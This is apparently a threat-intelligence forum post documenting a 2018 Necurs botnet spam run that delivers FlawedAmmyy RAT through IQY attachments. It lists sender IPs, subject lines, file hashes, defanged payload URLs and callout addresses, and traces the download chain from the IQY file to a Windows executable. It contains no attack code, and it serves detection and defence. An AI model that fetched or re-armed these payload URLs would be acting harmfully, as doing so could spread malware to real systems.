Necurs Botnet Delivering FlawedAmmyy RAT - 2018-06-13


#1

Necurs botnet sending out malspam which contains a IQY file attachment and the final payload appears to be FlawedAmmyy RAT.

The From email address and the To email address will share the domain. The from will be at domain of the To recipient.

Date/time:
2018-06-13T12:39:29

Sender IP:
95.76.19.110
217.64.107.131

Last hop:
95.76.18.236
217.64.107.196

Shodan.io / Censys.io for lasthop(s):
https://www.shodan.io/95.76.18.236
https://www.censys.io/ipv4/95.76.18.236
https://www.shodan.io/217.64.107.196
https://www.censys.io/ipv4/217.64.107.196

Headers received:
from [95[.]76[.]19[.]110] (unknown [95[.]76[.]18[.]236]) by Wed, 13 Jun 2018 12:39:29 +0000 (UTC)
from [217[.]64[.]107[.]131] (unknown [217[.]64[.]107[.]196]) by; Wed, 13 Jun 2018 12:39:42 +0000 (UTC)

Helo:
95[.]76[.]19[.]110
217[.]64[.]107[.]131

Headers x-mailer:
none

Subject line(s):
CPY0000258060
CPY00000754299
CP000089568
CPY0000484
COPY00009894
CPY00000926002
CPY00009601701
CP0000352
CPY00006684
SCAN_3193699_13062018
CPY0000274960
EPSON002_130618_00001

Message Body:
“Sent from my Samsung device”

Attachments:
Name: CPY0000258060.iqy
MD5: 9e54a976d2ab609d9462c71a813a1f81
SHA1: 880a494938f5aeb59455c4d32d544892395f46b5
SHA256: 47bdb8e1975c5162d35d6b42a395e7a61211364c55824525ea41c27c671d68fd
SHA512: 223836c1b5e63ba0f3225f62a2df629770e5fc0313d544e55527bd8aa5e294c439f22972a055b651d7c4c1e0c299321e6daeda09e19b3190c2e027c2a5d7f95b
File type: ASCII text, with CRLF line terminators
File size: 36

https://www.virustotal.com/#/file/47bdb8e1975c5162d35d6b42a395e7a61211364c55824525ea41c27c671d68fd/detection

Downloads:
hxxp://brtt7.com/preload.gif

Name: preload.gif
MD5: 7ce908bcef0bd51e5a091c2386f85327
SHA1: d174b07c843ea3a287d603e3bbadf63b9e9da51a
SHA256: 903ef3ab2201ebd83a7506597409527b88def373eaec0942582dc144c446069a
File type: ASCII text, with CRLF line terminators
File size: 16600

hxxp://brtt7.com/target.gif

Name: target.gif
MD5: dc7c5c557de7eb6878294e313e23083a
SHA1: 5ccb4b7da6275f488c7316ce8d10d92dd2371877
SHA256: 963f1735e9ee06c66fdf3a831d7c262bc8bce0d7155e37f9a5aa2677e0a6090c
File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bitPE32
File size: 215000

hxxp://brtt7.com/load.gif

Name: load.gif
MD5: 055fbddcc6acac5a5c80f9fd0be7b76d
SHA1: b7d2f84badc52c83ef4575669d8838a44c1f75ce
SHA256: e9c2cc6933f369990e7a96a4dbc8aa7c5cacb102590564e9376cfefc28972754
File type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
File size: 30400

Callouts:
185.176.221.29
169.239.129.125

https://community.riskiq.com/search/169.239.129.125
https://community.riskiq.com/search/certificate/serialNumber/57397899145990363081023081275480378375
https://community.riskiq.com/search/185.176.221.29

hxxp://185.176.221.29/ban3.dat

Name: ban3.dat
MD5: 0d7d4bb7ab1b92a1bf832a808d032194
SHA1: ff2bb5948e4a5c84110b84948ce43cccc4bc65da
SHA256: b1f096e1aee803a3db286924bee4ddd0d97f1856b21c2603ef561c142186d98a
File type: data
File size: 648000

Find more recent and related IOCs Necurs Botnet Delivering FlawedAmmyy RAT - 2018-06-07, Necurs Botnet Delivering FlawedAmmyy RAT - 2018-05-25.

More info:

#Necurs sending out new IQY web query files. Subject: CPxxxxxxx, downloads hxxp://brtt7.com/preload.gif -> hxxp://brtt7.com/load.gif -> hxxp://brtt7.com/target.gif -> target.gif (binary) @dvk01uk @JAMESWT_MHT @malwrhunterteam @GossiTheDog @jonathanscrowe pic.twitter.com/u1E7MWPLb2

— Magni R. Sigurdsson (@Magnirs) June 13, 2018

This is more #flawedammyy pic.twitter.com/4nAcnxKNm9

— James (@James_inthe_box) June 13, 2018